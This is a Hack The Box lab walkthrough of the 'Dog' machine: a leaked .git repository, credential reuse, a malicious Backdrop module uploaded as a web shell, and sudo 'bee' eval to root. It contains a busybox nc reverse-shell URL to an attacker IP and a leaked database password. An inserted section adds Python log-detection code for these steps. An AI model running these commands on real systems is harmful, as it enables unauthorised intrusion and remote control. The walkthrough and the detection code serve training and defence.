Dog (HTB)

WHAT THE DOG DOING

Intro

Welcome, everyone, to a new season HTB machine. Let's GO INTO IT.

Enumeration.

Port scanning.

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM/NEdzq1MMEw7EsZsxWuDa+kSb+OmiGvYnPofRWZOOMhFgsGIWfg8KS4KiEUB2IjTtRovlVVot709BrZnCvU8Y=
|   256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPMpkoATGAIWQVbEl67rFecNZySrzt944Y/hWAyq4dPc
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Home | Dog
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 22 disallowed entries 
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
| /user/password /user/login /user/logout /?q=admin /?q=comment/reply 
| /?q=filter/tips /?q=node/add /?q=search /?q=user/password 
|_/?q=user/register /?q=user/login /?q=user/logout
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

From the nmap scan we can see a .git directory lying out there. Let's check the web first and see what we have.

So I took a look around the app and downloaded the .git directory using the git-dumper tool.

git-dumper http://dog.htb/.git git

I searched through the files and found this interesting DB info.

After a long analysis I identified a user.

If we test this on the login page, we can see that it's valid but the password is wrong.

I also found a DB password in the settings file from the Git repository we downloaded.

$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';

But it does not work. I also did some brute-forcing, but also no luck. So I decided to go back to searching among the files until I found a new user.

So I tested the same password we found with this user, and indeed it worked this time.

Shell as www-data

So after we got access to the dashboard we can see that we are an administrator user.

After a simple search I was able to find a vulnerability that would allow us to execute commands on the server.

This is a good source we can use, and there is the one below too, but this one does not work because the server does not accept .zip; it accepts .tar files.

With this info, using the payload from the git repo, we can do this to use the shell.

Then we choose our file.

After clicking install and installing the module successfully, we then navigate here.

http://dog.htb/modules/reference/shell.php?cmd=whoam["command"]

With this we can execute commands on the server. I used this payload to gain a shell.

http://dog.htb/modules/reference/shell.php?cmd=busybox+nc+10.10.16.68+8899+-e+sh

Just change your info accordingly.
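Seen from the defender's side, both steps above leave clear traces in the Apache access log. The following is an added example, not part of the original write-up and not code from Backdrop or HTB: it flags a client that was served several /.git/ objects, and any direct 200 response for a PHP file under /modules/. The log lines are constructed, and the threshold and the "module PHP files are not requested directly" rule are assumptions to tune per site.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format: client ident user [time] "METHOD target PROTO" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Assumption: a CMS routes through index.php, so module .php files are not hit directly.
MODULE_PHP = re.compile(r'^/modules/[^/]+/.*\.php$', re.I)
GIT_THRESHOLD = 3  # assumed: distinct /.git/ paths served to one client before alerting

def analyze(lines):
    """Return findings as tuples: (rule, client, detail, query_parameter_names)."""
    git_hits = defaultdict(set)  # client -> /.git/ paths answered with 200
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line we understand
        client, _method, target, status = m.groups()
        url = urlsplit(target)
        if url.path.startswith('/.git/') and status == '200':
            git_hits[client].add(url.path)
        if MODULE_PHP.match(url.path) and status == '200':
            params = sorted(parse_qs(url.query, keep_blank_values=True))
            findings.append(('module-php-direct', client, url.path, params))
    for client, paths in git_hits.items():
        if len(paths) >= GIT_THRESHOLD:
            findings.append(('git-repo-dump', client, len(paths), []))
    return findings

# Constructed sample log lines (not captured from the target machine).
SAMPLE = [
    '203.0.113.7 - - [10/Mar/2025:10:00:01 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "python-requests/2.31"',
    '203.0.113.7 - - [10/Mar/2025:10:00:01 +0000] "GET /.git/config HTTP/1.1" 200 92 "-" "python-requests/2.31"',
    '203.0.113.7 - - [10/Mar/2025:10:00:02 +0000] "GET /.git/index HTTP/1.1" 200 4096 "-" "python-requests/2.31"',
    '203.0.113.7 - - [10/Mar/2025:10:00:02 +0000] "GET /.git/refs/heads/master HTTP/1.1" 200 41 "-" "python-requests/2.31"',
    '198.51.100.9 - - [10/Mar/2025:10:01:00 +0000] "GET /.git/HEAD HTTP/1.1" 404 274 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2025:10:01:05 +0000] "GET /?q=user/login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2025:10:20:00 +0000] "GET /modules/reference/shell.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.5.0"',
    '198.51.100.9 - - [10/Mar/2025:10:21:00 +0000] "GET /modules/example/missing.php HTTP/1.1" 404 274 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for finding in analyze(SAMPLE):
        print(finding)
```

Alerting like this complements the actual fix, which is to stop the web server from serving /.git/ at all.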

Shell as johncusack

After we got a shell as www-data I tried to search around. I remembered the database credentials we found earlier, so I checked the database hashes and attempted to crack them.

But no luck.

Then I tried to reuse the same password we found for the DB, and it actually works.

Shell as root.

Once I got access to johncusack I checked his permissions and found that he is able to run a program called bee as root. But what is bee?

So this tool helps us interact with Backdrop CMS. OK, cool, but what can we do with it? By running the help menu we can see a lot of commands, but a few seem interesting.

So there are two commands that help us run PHP code, which can allow us to execute shell commands. I tried them, but I kept encountering this error.

Basically it gives it on every command I tried. Just a side note: I had logged in via SSH.

I searched a lot but did not find a clear answer until I tried navigating to the Backdrop home folder, which is under:

/var/www/html

I tried to run the same command and finally got something.

From here it is so simple to get a root shell. I tried to create a PHP file with some system command in it, but it did not allow me.

So if it does not allow a file, what about eval?

And as simple as that, we got a root shell.

Closing thoughts

This machine was an easy machine, but I spent a lot of time searching for the second user we found; it was actually kind of hard to find, but we can say it's a lesson for future machines and future STUFF. The privilege escalation was so simple, either to the first user or to root: just some tricks here and there, and the rest is so simple. Thank you for reading :).
